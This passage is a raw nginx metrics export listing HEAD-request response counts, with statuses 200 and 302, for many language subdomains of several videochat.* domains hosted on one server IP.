nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.date"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.mx"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.world"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.cafe"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.cafe"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.mx"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.mx"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.tv.br"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.cafe"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.world"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.world"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.cafe"} 861 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.date"} 880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.mx"} 862 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.show"} 963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.tv.br"} 828 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.world"} 1070 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.cafe"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="161.97.120.25"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="161.97.120.25:80"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="af.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="al.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="am.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="am.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="am.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ar.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ar.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="az.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ba.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="be.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="be.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.cafe"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bn.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bn.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bs.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ca.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ca.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ceb.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="chm.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cs.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cs.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cy.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="da.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="da.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="da.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="de.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ee.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ee.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="el.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="el.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eo.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="es.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="es.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eu.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eu.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fa.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fa.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fr.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ga.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ga.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gl.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gl.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gl.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="he.videochat.cafe"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="he.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="he.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hi.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hr.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hu.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="id.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="id.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="is.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="jp.videochat.date"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="jp.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="jv.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ka.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kk.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kk.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kk.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="km.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="km.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kn.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kn.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ko.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ko.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ky.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lb.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lo.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lt.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lv.videochat.date"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lv.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mg.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mk.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ml.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ml.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mr.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mr.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ms.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mt.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="my.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ne.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ne.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ne.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="nl.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="nl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.cafe"} 100 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pap.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pt.videochat.cafe"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pt.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pt.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ro.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ro.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sco.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sco.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sl.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="su.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="su.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sv.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sv.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="te.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.tv.br"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.cafe"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.tv.br"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.date"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tl.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tt.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="udm.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ur.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ur.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uz.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="uz.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vi.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vi.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.cafe"} 754 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.date"} 765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.mx"} 754 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.show"} 826 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.tv.br"} 727 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="videochat.world"} 877 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="vmi460104.contaboserver.net"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="www.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="www.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="xh.videochat.world"} 3 